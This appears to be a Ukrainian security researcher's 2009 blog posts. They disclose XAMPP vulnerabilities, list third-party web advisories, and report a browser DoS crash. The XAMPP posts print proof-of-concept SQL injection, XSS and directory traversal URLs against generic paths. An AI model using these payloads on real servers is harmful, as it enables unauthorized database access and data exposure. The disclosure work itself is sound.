Websecurity - Веб безпека

В цьому місяці були оприлюднені численні уразливості в WordPress. Уразливі WordPress 2.8 та попередні версії, WordPress MU 2.7.1 та попередні версії, а також версія, що використовується на wordpress.com.

Були виявлені Local file include, Privileges unchecked, Cross-Site Scripting та Information disclosure уразливості.

Зокрема Local file include атака можлива через вектор, про який я писав ще в 2007 році в проекті День багів в WordPress (і який був неякісно виправлений розробниками WP). А також автори даного advisory згадали про Abuse of Functionality уразливість в WordPress, про яку я писав ще в квітні 2008 року.

• WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures (деталі)

20.06.2009

У червні, 11.06.2009, а також додатково сьогодні, я знайшов Information Leakage, Cross-Site Request Forgery та SQL Injection уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.07.2009

Information Leakage:

http://site/xampp/phpinfo.php

При доступі в адмінку (через Insufficient Authorization уразливості) можна отримати багато інформації про систему.

CSRF:

http://site/xampp/cds.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds.php?action=del&id=-1%20or%201=1

http://site/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds.php?interpret=1&titel=’,1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds.php?titel=1&interpret=’,1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

В даній добірці уразливості в веб додатках:

• Watchguard Firebox PPTP VPN User Enumeration Vulnerability (деталі)
• Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities (деталі)
• Websphere MQ MCAUSER Setting Bypass Vulnerability (деталі)
• Websphere MQ Security Exit Authentication Bypass Vulnerability (деталі)
• e107 <= 0.7.11 Arbitrary Variable Overwriting (деталі)
• Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3 (деталі)
• Magnet Blog Sql Injection Vulnerability (деталі)
• K-Links Directory Blind SQL Injection Exploit (деталі)
• Ovidentia Sql Injection (деталі)
• Kayako SupportSuite < 3.30.00 Multiple Vulnerabilities (деталі)

У листопаді, 29.11.2008, я знайшов Cross-Site Scripting уразливість на проекті http://rokf.ru. Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

• alert(document.cookie)
• цікавий
• html включення

В даній добірці уразливості в веб додатках:

• Borland Interbase 2007 Integer Overflow (деталі)
• Homes 4 Sale Remote XSS Vulnerabilitiy (деталі)
• Pligg Auto-Voter Using XSS to Bypass CSRF Protection (деталі)
• NeBoard Sql Injection Vulnerability (деталі)
• SAP Web Application Server XSS Security Vulnerability (деталі)
• CA Products That Embed Ingres Multiple Vulnerabilities (деталі)
• MyClan Sql Injection (деталі)
• PHP-NUKE module Kleinanzeigen SQL injection (lid) (деталі)
• Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities (деталі)
• IGES CMS <=2.0 Multiple Vulnerabilities (деталі)

15.06.2009

У червні, 11.06.2009, я знайшов Insufficient Authentication, Cross-Site Scripting та SQL Injection уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Нещодавно я вже писав про численні уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

21.07.2009

Insufficient Authentication:

http://site/xampp/

Зустрічаються сайти, де доступ да адмінки XAMPP не обмежений паролем.

XSS:

POST запит на сторінці http://site/xampp/adodb.php

"><script>alert(document.cookie)</script>В полях: Database server, Host, Username, Password, Current database, Selected table.

SQL Injection:

Атака відбувається при доступі в адмінку XAMPP - через вищезгадану Insufficient Authorization уразливість, або через знайдену раніше Insufficient Authorization уразливість.

На сторінці http://site/xampp/adodb.php

cds where 1=0 union select version(),0,0,0В полі Selected table.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

В даній добірці уразливості в веб додатках:

• IBM Tivoli PMfOSD HTTP Request Method Buffer Overflow Vulnerability (деталі)
• Pligg <= 9.9.0 Multiple Vulnerabilities (деталі)
• DEV WMS Multiple Vulnerabilities (деталі)
• Linksys WRT54G Security Bypass Vulnerability (деталі)
• linksys WRT54g authentication bypass (деталі)
• maxFileUpload file upload exploit (деталі)
• Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability (деталі)
• TGS CMS Remote Code Execution Exploit (деталі)
• UNAK-CMS Lfi (деталі)
• eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG (деталі)

Сьогодні, я писав про переповнення буфера в Mozilla Firefox. Уразливість в Firefox 3.5 була виявлена Andrew Haynes та Simon Berry-Byrne. Переповнення буфера відбувається при роботі браузера з Unicode символами.

Перевіривши 16.07.2009 дану уразливість в різних браузерах, я виявив, що дана Denial of Service уразливість працює в Firefox 3.0.11, Internet Explorer 6 та Opera 9.52.

DoS:

Firefox, IE & Opera DoS Exploit2.html

При запуску експлоіта Firefox вилітає, IE6 споживає ресурси процесора та пам’яті, а Opera підвисає, при цьому споживаючи ресурси CPU та RAM.

Уразлива версія Mozilla Firefox 3.0.11 та попередні версії (а також Firefox 3.5).

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії (і потенційно наступні версії).

Уразлива версія Opera 9.52 та попередні версії (і потенційно наступні версії).

P.S.

Як мені повідомив poma, Google Chrome 2.0.172 також уразливий (браузер вилітає). При тому, що Google Chrome 1.0.154.48 не вразливий - вірогідно вразливі лише Chrome 2.x.

В даній добірці уразливості в веб додатках:

• hacking the mitsubishi GB-50A (деталі)
• Local File Include Vulnerability in Minishowcase v09b136 (деталі)
• HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability (деталі)
• HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability (деталі)
• HIOX Star Rating System 1.0 Remote File Inclusion Vulnerability (деталі)
• plugin Rss Remote File Inclusion Vulnerability (деталі)
• shoutbox Remote Database Dawnload Exploit (деталі)
• Переповнення буфера в терміналах Wyse (деталі)
• Atmail Remote Authentication Bypass, Full DB Compromise (деталі)
• csphonebook 1.02 Remote XSS Vulnerabilitiy (деталі)

13.06.2009

У червні, 11.06.2009, я знайшов Predictable Resource Location, Information Leakage, Cross-Site Scripting та Directory Traversal уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Я вже писав про Cross-Site Scripting уразливість в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.07.2009

Predictable Resource Location:

В XAMPP є стандартні шляхи до ресурсів, які можуть бути використанні для атаки.

http://site/security/ - сервіс безпеки XAMPP
http://site/xampp/ - адмінка XAMPP
http://site/phpmyadmin/ - PhpMyAdmin
http://site/webalizer/ - Webalizer

Information Leakage:

http://site/webalizer/

Доступ до Webalizer не є обмеженим і враховуючи відомий шлях до ресурсу, будь-хто може отримати доступ до статистики сайта, що може призвести до значного витоку інформації, в тому числі про різні ресурси на сайті.

Information Leakage:

http://site/security/

Сервіс безпеки XAMPP (XAMPP SECURITY [Security Check 1.0]), якщо доступ до нього відкритий, призводить до витоку інформації.

Він виводить інформацію про версію PHP та про стан компонентів XAMPP, зокрема PhpMyAdmin.

XSS:

http://site/xampp/showcode.php?TEXT[global-showcode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/xampp/showcode.php?showcode=1&TEXT[global-sourcecode]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Працює при register globals.

Directory Traversal:

http://site/xampp/showcode.php?showcode=1&file=../index.php

Працює при register globals.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).